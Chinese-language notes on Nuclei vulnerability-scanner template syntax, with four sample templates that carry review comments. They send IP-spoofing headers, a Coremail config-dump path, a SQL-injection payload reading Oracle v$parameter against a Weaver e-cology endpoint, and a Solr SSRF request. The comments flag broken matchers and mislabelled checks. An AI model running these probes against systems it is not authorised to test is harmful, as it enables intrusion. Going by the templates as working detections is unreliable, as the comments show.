Nuclei 模板文件 记录

1: severity: info       # 定义危险级别,可选值如 info、medium、critical、high
2:
{{BaseURL}}       读取到的原始 URL
{{Hostname}}      请求头中的 Host
3:  
redirects: true #是否 重定向
max-redirects: 3 #最大重定向的深度
4:  
matchers-condition: and # 多个匹配器之间的逻辑关系(and / or)
5:  negative: true   # 负匹配器:对匹配结果取反
6:  extractors(提取器):类型 regex、kval;group: 1 表示取正则的第 1 个捕获组
7: cookie-reuse: true
# Sample template: a single GET probe that exercises the dsl, status, word
# and negative matcher forms.
id: temple-get

info:
  name: get-info
  author: YanYun
  severity: medium
  tags: dir,email,java

requests:
  - method: GET
    path:
      - '{{BaseURL}}/mailsms/s?func=ADMIN:appState&dumpConfig=/'
    # Every client-address header is pinned to loopback. Servers should not
    # derive the caller's address from these headers unless a trusted proxy
    # sets them.
    headers:
      X-Client-IP: '127.0.0.1'
      X-Remote-IP: '127.0.0.1'
      X-Remote-Addr: '127.0.0.1'
      X-Forwarded-For: '127.0.0.1'
      X-Originating-IP: '127.0.0.1'
    # All four matchers below have to succeed before a result is reported.
    matchers-condition: and
    matchers:
      # Body shorter than 1024 bytes and HTTP 200, as one DSL expression.
      - type: dsl
        dsl:
          - 'len(body)<1024 && status_code==200'

      # Repeats the status check the DSL expression already makes.
      - type: status
        status:
          - 200

      # negative + "condition: and": this matcher fails only when BOTH
      # strings are present; a response with just the configHome line
      # still passes it.
      # NOTE(review): the configHome string looks like the evidence of the
      # config dump, so negating it reports responses that do NOT show it.
      # Confirm that is the intent before relying on the result.
      - type: word
        words:
          - '<string name="configHome">/home/coremail</string>'
          - '404'
        condition: and
        negative: true

      # Named matcher evaluated against the response headers.
      - type: word
        name: php
        part: header
        words:
          - 'X-Powered-By: PHP'
# Sample template: the POST counterpart of the GET sample, sending a form
# body and reusing the same four matchers.
# NOTE(review): the id and name say Coremail, but the request goes to a
# generic /admin path and the only Coremail string is inside a negative
# matcher. Treat this as a syntax example, not a Coremail check.
id: Coremail-info

info:
  name: Coremail-info
  author: YanYun
  severity: medium
  tags: dir,email,java

requests:
  - method: POST
    path:
      - '{{BaseURL}}/admin'
    # Client-address headers pinned to loopback; a server should only honour
    # these when a trusted proxy sets them.
    headers:
      X-Client-IP: '127.0.0.1'
      X-Remote-IP: '127.0.0.1'
      X-Remote-Addr: '127.0.0.1'
      X-Forwarded-For: '127.0.0.1'
      X-Originating-IP: '127.0.0.1'
    body: 'admin=test'
    # Every matcher below must succeed for the template to report a hit.
    matchers-condition: and
    matchers:
      # Body shorter than 1024 bytes and HTTP 200.
      - type: dsl
        dsl:
          - 'len(body)<1024 && status_code==200'

      # Same status condition again, as a dedicated status matcher.
      - type: status
        status:
          - 200

      # Inverted word matcher: passes unless both strings occur together.
      - type: word
        words:
          - '<string name="configHome">/home/coremail</string>'
          - '404'
        condition: and
        negative: true

      # Named matcher evaluated against the response headers.
      - type: word
        name: php
        part: header
        words:
          - 'X-Powered-By: PHP'
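# Raw-request template for /mobile/browser/WorkflowCenterTreeData.jsp; the
# form body carries a SQL fragment in the formids parameter.
id: oa-cology-sql

info:
  name: oa-cology-sql
  author: Yanyun
  # NOTE(review): "info" looks low for a SQL-injection check; confirm the
  # intended rating.
  severity: info
  # Fixed: the key was misspelled "tages", so the template carried no tags
  # and tag-based selection would skip it.
  tags: sql,oa,java,dir

requests:
  - raw:
      # The request is kept exactly as captured.
      # NOTE(review): Content-Length: 2236 does not match the short body,
      # Upgrade-Insecure-Requests appears twice, and the Cookie is a fixed
      # session value; all three look like leftovers from the capture.
      - |
        POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: ecology_JSessionId=abc49y8JvMcoqhSkCv02w; testBanCookie=test
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 2236
        Upgrade-Insecure-Requests: 1

        formids=11111111111))) select NULL,value from v$parameter order by (((1

    # NOTE(review): these matchers are the same ones used by the Coremail
    # samples on this page. None of them looks at query output, so any 200
    # response under 1024 bytes that lacks the two strings is reported.
    # Expect false positives until a matcher tied to this endpoint's
    # response is added.
    matchers-condition: and
    matchers:
      # Body shorter than 1024 bytes and HTTP 200.
      - type: dsl
        dsl:
          - "len(body)<1024 && status_code==200"

      # Repeats the status check made by the DSL expression.
      - type: status
        status:
          - 200

      # Inverted word matcher: passes unless both strings occur together.
      - type: word
        words:
          - '<string name="configHome">/home/coremail</string>'
          - '404'
        condition: and
        negative: true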
# Two-step raw template: a value extracted from the first response is
# substituted into the second request as {{core}}.
# NOTE(review): id, name and tags cite CVE-2021-27905 (Apache Solr SSRF),
# but the first request fetches /account/login.php, masterUrl points at
# example.com, and the matchers only look for a 404 plus the word
# 'tokenId'. Nothing here verifies that the server made an outbound fetch,
# so a hit does not confirm the CVE. Read it as an extractor syntax example.
id: CVE-2021-27905

info:
  name: Apache Solr <= 8.8.1 SSRF
  author: hackergautam
  severity: medium
  tags: cve,cve2021,apache,solr,ssrf

requests:
  - raw:
      # Request 1: the page the extractor reads the hidden input from.
      - |
        GET /account/login.php  HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close

      # Request 2: uses the extracted value as the {{core}} path segment.
      - |
        GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://example.com HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close

    extractors:
      # Capture group 1 is the hidden input's value attribute.
      # internal: true keeps it as a template variable instead of printing
      # it in the results.
      - type: regex
        name: core
        internal: true
        group: 1
        regex:
          - '<input type="hidden" name="846c3d198c2af4004cdc58e6e5f00468d81bdda4" value="(.*?)">'

    # Both matchers must succeed for a hit.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 404

      - type: word
        words:
          - 'tokenId'

 

